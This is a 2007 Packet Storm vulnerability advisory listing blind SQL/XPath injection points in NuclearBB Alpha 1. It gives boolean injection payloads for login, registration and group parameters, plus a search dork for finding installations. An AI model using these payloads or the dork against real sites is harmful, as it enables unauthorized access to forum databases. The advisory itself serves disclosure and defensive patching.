nuclearbb-sql.txt

2007-04-19T00:00:00
ID PACKETSTORM:56069
Type packetstorm
Reporter John Martinelli
Modified 2007-04-19T00:00:00

Description

                                        
                                            `NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities  
  
Vulnerable: NuclearBB Alpha 1  
Google d0rk: "This forum is powered by NuclearBB"  
  
  
=============  
String Inputs  
=============  
  
----------------------------  
login.php - $_POST['submit']  
----------------------------  
  
username=xyz  
password=passxyz  
submit=Login"+and+"1"="0  
  
--------------------------------  
register.php - $_POST['website']  
--------------------------------  
  
username=xyz@xyz.com  
email=xyz@xyz.com  
pass1=passwordxyz  
pass2=passwordxyz  
website=xyz@xyz.com"+and+"1"="0  
location=xyz@xyz.com  
msn=xyz@xyz.com  
yahoo=xyz@xyz.com  
aol=xyz@xyz.com  
icq=xyz@xyz.com  
signature=xyz@xyz.com  
coppa_state=over  
register_submit=Register  
  
----------------------------  
register.php - $_POST['aol']  
----------------------------  
  
username=xyz@xyz.com  
email=xyz@xyz.com  
pass1=xyz@xyz.com  
pass2=xyz@xyz.com  
website=xyz@xyz.com  
location=xyz@xyz.com  
msn=xyz@xyz.com  
yahoo=xyz@xyz.com  
aol=xyz@xyz.com"+and+"1"="0  
icq=xyz@xyz.com  
signature=xyz@xyz.com  
coppa_state=over  
register_submit=Register  
  
----------------------------------  
register.php - $_POST['signature']  
----------------------------------  
  
username=xyz@xyz.com  
email=xyz@xyz.com  
pass1=xyz@xyz.com  
pass2=xyz@xyz.com  
website=xyz@xyz.com  
location=xyz@xyz.com  
msn=xyz@xyz.com  
yahoo=xyz@xyz.com  
aol=xyz@xyz.com  
icq=xyz@xyz.com  
signature=xyz@xyz.com"+and+"1"="0  
coppa_state=over  
register_submit=Register  
  
==============  
Numeric Inputs  
==============  
  
-----------------------  
groups.php - $_GET['g']  
-----------------------  
  
http://www.example.com/groups.php?g=1+and+1=0  
  
------------------------------  
register.php - $_POST['email']  
------------------------------  
  
username=xyz@xyz.com  
email=xyz@xyz.com+and+1=0  
pass1=xyz@xyz.com  
pass2=xyz@xyz.com  
website=xyz@xyz.com  
location=xyz@xyz.com  
msn=xyz@xyz.com  
yahoo=xyz@xyz.com  
aol=xyz@xyz.com  
icq=xyz@xyz.com  
signature=xyz@xyz.com  
coppa_state=over&register_submit=Register  
  
  
John Martinelli  
john@martinelli.com  
http://john-martinelli.com  
  
April 18th, 2007  
`